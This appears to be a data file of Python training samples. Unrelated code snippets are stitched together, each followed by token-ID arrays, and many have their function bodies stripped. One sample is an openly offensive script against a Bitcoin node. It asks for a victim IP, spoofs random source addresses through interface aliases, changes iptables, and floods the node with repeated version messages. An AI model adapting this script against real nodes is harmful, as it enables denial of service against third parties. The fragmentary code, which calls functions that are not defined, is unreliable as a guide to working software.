[ 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 10786, 2637, 8, 198, 11748, 28686, 198, 6738, 19720, 1330, 32233, 11, 4479, 198, 198, 11748, 269, 85, 17, 198, 11748, 299, 32152, 355, ...
3.293333
75
from typing import TYPE_CHECKING if TYPE_CHECKING: from Platforms.Web.main_web import PhaazebotWeb import json from aiohttp.web import Response from Utils.Classes.extendedrequest import ExtendedRequest
[ 6738, 19720, 1330, 41876, 62, 50084, 2751, 198, 361, 41876, 62, 50084, 2751, 25, 198, 197, 6738, 19193, 82, 13, 13908, 13, 12417, 62, 12384, 1330, 1380, 64, 1031, 1765, 313, 13908, 198, 198, 11748, 33918, 198, 6738, 257, 952, 4023, 13...
3.4
60
import torch import torch.nn as nn
[ 11748, 28034, 198, 11748, 28034, 13, 20471, 355, 299, 77, 628, 198 ]
3.083333
12
""" Module for plotting analyses """ import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from copy import deepcopy import pickle, json import os from matplotlib.offsetbox import AnchoredOffsetbox try: basestring except NameError: basestring = str colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3 def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): """ Add scalebars to axes Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes - axis : the axis to attach ticks to - matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params - hidex,hidey : if True, hide x-axis and y-axis of parent - **kwargs : additional arguments passed to AnchoredScaleBars Returns created scalebar object """ if matchx: sizex = get_tick_size(axis.xaxis) if matchy: sizey = get_tick_size(axis.yaxis) if 'sizex' in kwargs: sizex = kwargs['sizex'] if 'sizey' in kwargs: sizey = kwargs['sizey'] if ymax is not None and sizey>ymax: sizey = autosize(sizey, ymax, scaley) if xmax is not None and sizex>xmax: sizex = autosize(sizex, xmax, scalex) kwargs['sizex'] = sizex kwargs['sizey'] = sizey if unitsx is None: unitsx = '' if unitsy is None: unitsy = '' if 'labelx' not in kwargs or kwargs['labelx'] is None: kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx) if 'labely' not in kwargs or kwargs['labely'] is None: kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy) # add space for scalebar if space is not None: ylim0, ylim1 = axis.get_ylim() ylim = (ylim0 - space, ylim1) if ylim0 > ylim1: # if y axis is inverted ylim = (ylim0 + space, ylim1) axis.set_ylim(ylim) scalebar = AnchoredScaleBar(axis, **kwargs) axis.add_artist(scalebar) if hidex: axis.xaxis.set_visible(False) if hidey: axis.yaxis.set_visible(False) if hidex and hidey: axis.set_frame_on(False) return scalebar
[ 37811, 198, 26796, 329, 29353, 13523, 198, 198, 37811, 198, 198, 11748, 2603, 29487, 8019, 355, 285, 489, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 4866, 1330, 2769, 300...
2.156352
1,228
from mo_parsing.helpers import QuotedString wikiInput = """ Here is a simple Wiki input: *This is in italics.* **This is in bold!** ***This is in bold italics!*** Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}} """ italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>")) bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>")) boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>")) urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A) wikiMarkup = urlRef | boldItalicized | bolded | italicized
[ 6738, 6941, 62, 79, 945, 278, 13, 16794, 364, 1330, 2264, 5191, 10100, 201, 198, 201, 198, 15466, 20560, 796, 37227, 201, 198, 4342, 318, 257, 2829, 13078, 5128, 25, 201, 198, 220, 1635, 1212, 318, 287, 46127, 873, 15885, 201, 198, ...
2.496296
270
import pytest import re from typing import Any, Tuple from dataclasses import dataclass from app_settings_dict import Settings
[ 11748, 12972, 9288, 198, 11748, 302, 198, 6738, 19720, 1330, 4377, 11, 309, 29291, 198, 6738, 4818, 330, 28958, 1330, 4818, 330, 31172, 198, 6738, 598, 62, 33692, 62, 11600, 1330, 16163, 628, 628, 628, 628, 628, 628, 628, 628 ]
3.55
40
import os import time import cv2 import sys sys.path.append('..') import numpy as np from math import cos, sin from lib.FSANET_model import * import numpy as np from keras.layers import Average if __name__ == '__main__': main()
[ 11748, 28686, 198, 11748, 640, 198, 198, 11748, 269, 85, 17, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 10786, 492, 11537, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 10688, 1330, 8615, 11, 7813, 198, 198, 6738, 9195, 13, ...
2.711111
90
import discord from discord.commands import option bot = discord.Bot(debug_guilds=[...]) COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"] LOTS_OF_COLORS = [ "aliceblue", "antiquewhite", "aqua", "aquamarine", "azure", "beige", "bisque", "blueviolet", "brown", "burlywood", "cadetblue", "cornflowerblue", "cornsilk", "crimson", "cyan", "darkblue", "deepskyblue", "dimgray", "dimgrey", "dodgerblue", "firebrick", "floralwhite", "forestgreen", "fuchsia", "gainsboro", "ghostwhite", "gold", "goldenrod", "gray", "green", "greenyellow", "grey", "honeydew", "hotpink", "indianred", "indigo", "ivory", "khaki", "lavender", "lavenderblush", "lawngreen", "lightcoral", "maroon", "mediumaquamarine", "mediumblue", "mediumorchid", "midnightblue", "navajowhite", "navy", "oldlace", "olive", "olivedrab", "orange", "orangered", "orchid", "palegoldenrod", "palegreen", "plum", "powderblue", "purple", "red", "rosybrown", "royalblue", "saddlebrown", "sienna", "springgreen", "steelblue", "tan", "teal", "thistle", "tomato", "turquoise", "violet", "wheat", "white", "whitesmoke", "yellow", "yellowgreen", ] BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example bot.run("TOKEN")
[ 11748, 36446, 198, 6738, 36446, 13, 9503, 1746, 1330, 3038, 198, 198, 13645, 796, 36446, 13, 20630, 7, 24442, 62, 70, 3547, 82, 41888, 986, 12962, 198, 198, 25154, 20673, 796, 14631, 445, 1600, 366, 43745, 1600, 366, 36022, 1600, 366, ...
2.031209
769
from _thread import start_new_thread from bitcoin.messages import * from bitcoin.net import CAddress from bitcoin.core import CBlock from io import BytesIO as _BytesIO import atexit import bitcoin import fcntl import hashlib import json import os import random import re import socket import struct import sys import time import datetime if os.geteuid() != 0: sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n") # Specify the attacker's genuine IP attacker_ip = input('\nEnter attacker\'s IP address: ') # Specify the victim's IP, and port (8333 for Bitcoin) victim_ip = input('Enter victim\'s IP address: ') victim_port = 8333 # How many identities should run simultaneously num_identities = 8 # While attacking the victim, wait this many seconds before sending each version message seconds_between_version_packets = 0.1 identity_interface = [] # Keeps the IP alias interface and IP for each successful connection identity_address = [] # Keeps the IP and port for each successful connection identity_socket = [] # Keeps the socket for each successful connection # The file where the iptables backup is saved, then restored when the script ends iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules' # Send commands to the Linux terminal # Send commands to the Bitcoin Core Console # Generate a random identity using the broadcast address template # Checking the internet by sending a single ping to Google #def internet_is_active(): # return os.system('ping -c 1 google.com') == 0 # If all else fails, we can use this to recover the network #def reset_network(): # print('Resetting network...') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} down') # terminal(f'sudo ifconfig {network_interface} {attacker_ip} up') # Create an alias for a specified identity # Construct a block packet using python-bitcoinlib # Construct a version packet using python-bitcoinlib # Close a connection # Creates a fake connection to the victim # Send version repeatedly, until banned # Initialize the network # Initialize Bitcoin info # Save a backyp of the iptable rules # Restore the backup of the iptable rules # Remove all ip aliases that were created by the script # This function is ran when the script is stopped # This is the first code to run if __name__ == '__main__': global alias_num alias_num = 0 # Increments each alias initialize_network_info() initialize_bitcoin_info() atexit.register(on_close) # Make on_close() run when the script terminates cleanup_iptables() # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring backup_iptables() # Create the connections for i in range(1, num_identities + 1): try: make_fake_connection(src_ip = random_ip(), dst_ip = victim_ip) except ConnectionRefusedError: print('Connection was refused. The victim\'s node must not be running.') print(f'Successful connections: {len(identity_address)}\n') # Prevent the script from terminating when the sniff function is still active while 1: time.sleep(60)
[ 6738, 4808, 16663, 1330, 923, 62, 3605, 62, 16663, 198, 6738, 8550, 13, 37348, 1095, 1330, 1635, 198, 6738, 8550, 13, 3262, 1330, 327, 20231, 198, 6738, 8550, 13, 7295, 1330, 327, 12235, 198, 6738, 33245, 1330, 2750, 4879, 9399, 355, ...
3.512792
899
#!python3 ''' author: justZero email: alonezero@foxmail.com date: 2017-8-6 ''' import time import pandas as pd import numpy as np import pymysql import pymysql.cursors import pprint if __name__ == '__main__': inputFile = 'data/douban_movie_clean.txt' movies_df = pd.read_csv(inputFile, sep='^') movies = np.array(movies_df).tolist() db = MySQLdb() try: db.insert_movie(movies) except Exception as e: raise e finally: db.close()
[ 2, 0, 29412, 18, 198, 198, 7061, 6, 628, 198, 9800, 25, 655, 28667, 198, 12888, 25, 3436, 22570, 31, 12792, 4529, 13, 785, 198, 4475, 25, 2177, 12, 23, 12, 21, 198, 7061, 6, 198, 198, 11748, 640, 198, 11748, 19798, 292, 355, 279...
2.231818
220
import ezff from ezff.interfaces import gulp, qchem # Define ground truths gt_gs = qchem.read_structure('ground_truths/optCHOSx.out') gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out') gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out') gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out') # Read template and variable ranges bounds = ezff.read_variable_bounds('variable_bounds', verbose=False) template = ezff.read_forcefield_template('template') problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template) algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16) ezff.optimize(problem, algorithm, iterations = 5)
[ 11748, 304, 89, 487, 198, 6738, 304, 89, 487, 13, 3849, 32186, 1330, 308, 29528, 11, 10662, 15245, 198, 198, 2, 2896, 500, 2323, 24279, 198, 13655, 62, 14542, 796, 10662, 15245, 13, 961, 62, 301, 5620, 10786, 2833, 62, 35310, 82, 14...
2.873016
252
import logging from testing_func import testing_func, test_logger from unit_parse import logger, Unit, Q from unit_parse.utils import * test_logger.setLevel(logging.DEBUG) logger.setLevel(logging.DEBUG) test_split_list = [ # positive control (changes) [["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}], [["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}], [["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}], [["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}], # negative control (no changes) [["fish"], ["fish"], {"chunks": ["fish"]}], [["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}], [[Unit("g")], [Unit("g")], {"chunks": ["is"]}], ] testing_func(split_list, test_split_list) test_round_off = [ # [Input, Output] # positive control (works) [234.2342300000001, 234.23423, {"sig_digit": 15}], [234.2342399999999999, 234.23424, {"sig_digit": 15}], [234.2342300000001, 234.23, {"sig_digit": 5}], [234.2342399999999999, 234.23, {"sig_digit": 5}], [234.2342399999999999, 200, {"sig_digit": 1}], [-234.2342399999999999, -200, {"sig_digit": 1}], [-234.2342399999999999, -234.23424, {"sig_digit": 15}], # negative control (fails) ] testing_func(sig_figs, test_round_off) test_list_depth = [ # [Input, Output] # positive control (works) ["", 0], [[], 0], ["asds", 0], [1, 0], [["aaa"], 1], [[["aaa"]], 2], [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2], [[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2], [[[["aaa"], ["aaa"], ["aaa"]]], 3], # negative control (fails) ] testing_func(get_list_depth, test_list_depth) test_remove_empty_cells = [ # [Input, Output] # positive control (works) [[], None], [[""], None], [["asds"], ["asds"]], [1, 1], [["aaa", ""], ["aaa"]], [["aaa", []], ["aaa"]], [[["aaa", []]], [["aaa"]]], [[["aaa", [""]]], [["aaa"]]], # negative control (fails) ] testing_func(remove_empty_cells, test_remove_empty_cells) examples_quantity_difference = [ [Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}], [5, 1, {"quantity2": Q("10 g")}], ] testing_func(quantity_difference, examples_quantity_difference)
[ 11748, 18931, 198, 198, 6738, 4856, 62, 20786, 1330, 4856, 62, 20786, 11, 1332, 62, 6404, 1362, 198, 6738, 4326, 62, 29572, 1330, 49706, 11, 11801, 11, 1195, 198, 6738, 4326, 62, 29572, 13, 26791, 1330, 1635, 198, 198, 9288, 62, 6404,...
2.297189
996
import sys from Crypto.Signature import pkcs1_15 from Crypto.Hash import SHA256 from Crypto.PublicKey import RSA if __name__ == '__main__': key_file = sys.argv[1] input_string = sys.argv[2] out_file = sys.argv[3] sign_data(key_file, input_string, out_file)
[ 11748, 25064, 198, 198, 6738, 36579, 13, 11712, 1300, 1330, 279, 74, 6359, 16, 62, 1314, 198, 6738, 36579, 13, 26257, 1330, 25630, 11645, 198, 6738, 36579, 13, 15202, 9218, 1330, 42319, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, ...
2.509091
110
from typing import Any, Callable, NamedTuple, Optional, Union from pandas import DataFrame from freqtrade.exceptions import OperationalException from freqtrade.strategy.strategy_helper import merge_informative_pair PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame] def informative(timeframe: str, asset: str = '', fmt: Optional[Union[str, Callable[[Any], str]]] = None, ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]: """ A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to define informative indicators. Example usage: @informative('1h') def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame: dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14) return dataframe :param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe. :param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use current pair. :param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not specified, defaults to: * {base}_{quote}_{column}_{timeframe} if asset is specified. * {column}_{timeframe} if asset is not specified. Format string supports these format variables: * {asset} - full name of the asset, for example 'BTC/USDT'. * {base} - base currency in lower case, for example 'eth'. * {BASE} - same as {base}, except in upper case. * {quote} - quote currency in lower case, for example 'usdt'. * {QUOTE} - same as {quote}, except in upper case. * {column} - name of dataframe column. * {timeframe} - timeframe of informative dataframe. :param ffill: ffill dataframe after merging informative pair. """ _asset = asset _timeframe = timeframe _fmt = fmt _ffill = ffill return decorator
[ 6738, 19720, 1330, 4377, 11, 4889, 540, 11, 34441, 51, 29291, 11, 32233, 11, 4479, 198, 198, 6738, 19798, 292, 1330, 6060, 19778, 198, 198, 6738, 2030, 80, 25351, 13, 1069, 11755, 1330, 6564, 864, 16922, 198, 6738, 2030, 80, 25351, 13...
2.960843
664
from functools import partial from selenium.webdriver import Firefox from selenium.webdriver.support.ui import ( WebDriverWait ) esperar_botao = partial(esperar_elemento, 'button') esperar_sucesso = partial(esperar_elemento, '#finished') url = 'https://selenium.dunossauro.live/aula_09_a.html' driver = Firefox() wdw = WebDriverWait(driver, 10) driver.get(url) wdw.until(esperar_botao, 'Deu ruim') driver.find_element_by_css_selector('button').click() wdw.until( esperar_sucesso, 'A mensagem de sucesso no apareceu' ) sucesso = driver.find_element_by_css_selector('#finished') assert sucesso.text == 'Carregamento concludo'
[ 6738, 1257, 310, 10141, 1330, 13027, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 1330, 16802, 198, 6738, 384, 11925, 1505, 13, 12384, 26230, 13, 11284, 13, 9019, 1330, 357, 198, 220, 220, 220, 5313, 32103, 21321, 198, 8, 628, 198, ...
2.501931
259
import torch from torch import nn from prae.distances import square_dist, HingedSquaredEuclidean def tile(embedding, example): """ """ n = example.shape[0]//embedding.shape[0] embedding = embedding.unsqueeze(1).repeat(1, n, 1) embedding = squeeze_embedding(embedding) return embedding def squeeze_embedding(x): """ """ b, n, d = x.shape x = x.reshape(b*n, d) return x
[ 11748, 28034, 198, 6738, 28034, 1330, 299, 77, 198, 6738, 7201, 68, 13, 17080, 1817, 1330, 6616, 62, 17080, 11, 367, 24431, 22266, 1144, 36, 36616, 485, 272, 628, 628, 198, 4299, 17763, 7, 20521, 12083, 11, 1672, 2599, 198, 220, 220, ...
2.416185
173